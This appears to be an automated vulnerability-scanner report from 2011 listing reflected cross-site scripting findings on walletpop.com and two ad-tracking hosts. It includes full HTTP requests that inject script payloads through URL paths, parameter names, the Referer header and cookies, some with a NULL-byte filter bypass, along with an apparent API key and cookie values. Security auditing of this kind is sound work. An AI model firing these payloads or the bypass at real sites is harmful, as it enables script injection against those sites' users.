The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eaf5"><script>alert(1)</script>fbddcc9eb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/basics?7eaf5"><script>alert(1)</script>fbddcc9eb8b=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a386b"><script>alert(1)</script>855cf0b17f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesa386b"><script>alert(1)</script>855cf0b17f3/basics/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f181f"><script>alert(1)</script>68ec6be0af4 was submitted in the REST URL parameter 2. This input was echoed as f181f"><script>alert(1)</script>68ec6be0af4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/basics%00f181f"><script>alert(1)</script>68ec6be0af4/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/basics%00f181f"><script>alert(1)</script>68ec6be0af4/"/> ...[SNIP]...
1.751. http://www.walletpop.com/taxes/basics/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/basics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b9b"><script>alert(1)</script>25c9788e252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/basics/?d5b9b"><script>alert(1)</script>25c9788e252=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c68"><script>alert(1)</script>cde2c294d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes28c68"><script>alert(1)</script>cde2c294d4c/credit HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1bf6"><script>alert(1)</script>16a17c857b4 was submitted in the REST URL parameter 2. This input was echoed as f1bf6"><script>alert(1)</script>16a17c857b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/credit%00f1bf6"><script>alert(1)</script>16a17c857b4 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:32 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999900
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/credit%00f1bf6"><script>alert(1)</script>16a17c857b4/"/> ...[SNIP]...
1.754. http://www.walletpop.com/taxes/credit [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/credit
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540a1"><script>alert(1)</script>ce8bf8ae5ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/credit?540a1"><script>alert(1)</script>ce8bf8ae5ae=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b826"><script>alert(1)</script>0fd5878fd3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes5b826"><script>alert(1)</script>0fd5878fd3c/credit/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009aaa3"><script>alert(1)</script>a360555dfe was submitted in the REST URL parameter 2. This input was echoed as 9aaa3"><script>alert(1)</script>a360555dfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/credit%009aaa3"><script>alert(1)</script>a360555dfe/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:34 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/credit%009aaa3"><script>alert(1)</script>a360555dfe/"/> ...[SNIP]...
1.757. http://www.walletpop.com/taxes/credit/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/credit/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99988"><script>alert(1)</script>aee0921a12c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/credit/?99988"><script>alert(1)</script>aee0921a12c=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d8d8"><script>alert(1)</script>9e4d2daa341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes5d8d8"><script>alert(1)</script>9e4d2daa341/forms HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b235b"><script>alert(1)</script>f1977b4d3f9 was submitted in the REST URL parameter 2. This input was echoed as b235b"><script>alert(1)</script>f1977b4d3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/forms%00b235b"><script>alert(1)</script>f1977b4d3f9 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:34 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999965
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/forms%00b235b"><script>alert(1)</script>f1977b4d3f9/"/> ...[SNIP]...
1.760. http://www.walletpop.com/taxes/forms [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/forms
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606a"><script>alert(1)</script>51cc7685ddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/forms?f606a"><script>alert(1)</script>51cc7685ddf=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39e3"><script>alert(1)</script>aaa376160aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesb39e3"><script>alert(1)</script>aaa376160aa/forms/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0068092"><script>alert(1)</script>051fa4be222 was submitted in the REST URL parameter 2. This input was echoed as 68092"><script>alert(1)</script>051fa4be222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/forms%0068092"><script>alert(1)</script>051fa4be222/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:31 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/forms%0068092"><script>alert(1)</script>051fa4be222/"/> ...[SNIP]...
1.763. http://www.walletpop.com/taxes/forms/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/forms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b40"><script>alert(1)</script>a165336345d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/forms/?f0b40"><script>alert(1)</script>a165336345d=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"><script>alert(1)</script>2b2f61f6d44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes4eb22"><script>alert(1)</script>2b2f61f6d44/online HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00744dd"><script>alert(1)</script>c2aec8b8417 was submitted in the REST URL parameter 2. This input was echoed as 744dd"><script>alert(1)</script>c2aec8b8417 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/online%00744dd"><script>alert(1)</script>c2aec8b8417 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/online%00744dd"><script>alert(1)</script>c2aec8b8417/"/> ...[SNIP]...
1.766. http://www.walletpop.com/taxes/online [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/online
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962f2"><script>alert(1)</script>8bf0511d965 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/online?962f2"><script>alert(1)</script>8bf0511d965=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37240"><script>alert(1)</script>a4705706194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes37240"><script>alert(1)</script>a4705706194/online/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005c48e"><script>alert(1)</script>d66fd919a3d was submitted in the REST URL parameter 2. This input was echoed as 5c48e"><script>alert(1)</script>d66fd919a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/online%005c48e"><script>alert(1)</script>d66fd919a3d/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/online%005c48e"><script>alert(1)</script>d66fd919a3d/"/> ...[SNIP]...
1.769. http://www.walletpop.com/taxes/online/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/online/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d65e"><script>alert(1)</script>7cb0b1c7a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/online/?6d65e"><script>alert(1)</script>7cb0b1c7a00=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 87337<script>alert(1)</script>0c07fa081c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 87337<script>alert(1)</script>0c07fa081c4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 06 Feb 2011 20:59:28 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload b842a<script>alert(1)</script>9b50966891e was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1b842a<script>alert(1)</script>9b50966891e; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:51:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... ecExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&', "BMX_3PC": '1b842a<script>alert(1)</script>9b50966891e', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload a5843<script>alert(1)</script>408a77c22b1 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
